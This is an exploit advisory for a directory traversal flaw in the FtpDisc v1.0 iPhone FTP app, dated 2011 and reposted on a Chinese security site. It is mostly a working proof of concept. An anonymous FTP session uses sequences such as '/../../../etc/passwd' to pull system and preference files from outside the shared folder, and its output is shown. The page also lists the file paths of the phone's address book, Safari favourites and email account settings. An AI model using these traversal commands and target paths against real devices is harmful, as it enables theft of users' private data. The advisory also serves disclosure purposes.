首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FtpDisc v1.0 for iPhone / iPod touch, Directory Traversal
来源:vfocus.net 作者:Sunlight 发布时间:2011-02-23  

 

# There is directory traversal vulnerability in the FtpDisc. 
# Exploit Testing

C:\>ftp
ftp> open 192.168.0.70 2121
Connected to 192.168.0.70.
220 Mocha FTP Server
User (192.168.0.70:(none)): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
drwxrwxrwx   1 nobody    nobody      68         Jan  3 17:14 documents
drwxrwxrwx   1 nobody    nobody      68         Jan  3 17:14 other
drwxrwxrwx   1 nobody    nobody      68         Jan  3 17:14 photos
drwxrwxrwx   1 nobody    nobody      68         Jan  3 17:14 video
226 Transfer completed
ftp: 277 bytes received in 0.00Seconds 277000.00Kbytes/sec.
ftp> cd //..//..//..//..//..//..//
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
-r-xr-xr-x   1 nobody    nobody      0          Aug  3  201012:41 .file
dr-xr-xr-x   1 nobody    nobody      1428       Feb  8 12:50 Applications
dr-xr-xr-x   1 nobody    nobody      68         Aug 19  2010 4:10 Developer
dr-xr-xr-x   1 nobody    nobody      884        Jan 12 12:53 Library
dr-xr-xr-x   1 nobody    nobody      102        Aug 19  2010 4:18 System
dr-xr-xr-x   1 nobody    nobody      306        Feb  8 11:48 User
dr-xr-xr-x   1 nobody    nobody      2074       Jan 13  9:52 bin
dr-xr-xr-x   1 nobody    nobody      68         Oct 26  2010 1:19 boot
-r-xr-xr-x   1 nobody    nobody      638        Jan 25 15:30 control
dr-xr-xr-x   1 nobody    nobody      68         Aug  3  201012:41 cores
   1 nobody    nobody      68           1  dev
dr-xr-xr-x   1 nobody    nobody      918        Jan 26 11:34 etc
dr-xr-xr-x   1 nobody    nobody      68         Oct 26  2010 1:19 lib
dr-xr-xr-x   1 nobody    nobody      68         Oct 26  2010 1:19 mnt
dr-xr-xr-x   1 nobody    nobody      136        Oct 23  201015:12 private
dr-xr-xr-x   1 nobody    nobody      1666       Jan 13  9:52 sbin
drwxrwxrwx   1 nobody    nobody      272        Feb 22 16:02 tmp
dr-xr-xr-x   1 nobody    nobody      374        Jan 13  9:52 usr
dr-xr-xr-x   1 nobody    nobody      1088       Oct 26  2010 1:19 var
226 Transfer completed
ftp: 1461 bytes received in 0.02Seconds 91.31Kbytes/sec.
ftp> get ../../../../../../etc/passwd
200 PORT command successful.
550 cannot find the file
ftp> get /../../../../../../etc/passwd
200 PORT command successful.
150 Opening ASCII mode data connection for /../../../../../../etc/passwd
226 Transfer completed
ftp: 785 bytes received in 0.00Seconds 785000.00Kbytes/sec.
ftp> get //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
200 PORT command successful.
150 Opening ASCII mode data connection for //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
226 Transfer completed
ftp: 1239 bytes received in 0.00Seconds 1239000.00Kbytes/sec.
ftp> quit
221 Goodbye

C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

C:\>type com.apple.Maps.plist
bplist00?

C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>

 

# IPhone inside information

1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
    
2. Safari Favorites List
 - /private/var/mobile/Library/Safari

3. Users E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist

# Exploit Title: FtpDisc v1.0 for iPhone / iPod touch, Directory Traversal
# Date: 02/22/2011
# Author: R3d@l3rt, Sp@2K, Sunlight
# Software Link: http://itunes.apple.com/kr/app/ftpdisc-lite-pdf-reader/id329157971?mt=8
# Version: 1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware 
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Solar FTP 2.1 Denial of Servic
·SideBooks v1.0 for iPhone / iP
·WinMerge v2.12.4 Project File
·ProQuiz 2 Shell Upload
·JAKCMS <= v2.01 RC1 Blind SQL
·WordPress Uploadify 1.0 Shell
·BEES企业网站管理系统 v1.6后台
·Red Hat Enterprise Linux seuns
·JAKCMS <= v2.01 RC1 Blind SQL
·Air Files v2.6 for iPhone / iP
·JAKCMS <= v2.01 Code Execution
·Filer Lite v2.1.0 for iPhone /
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved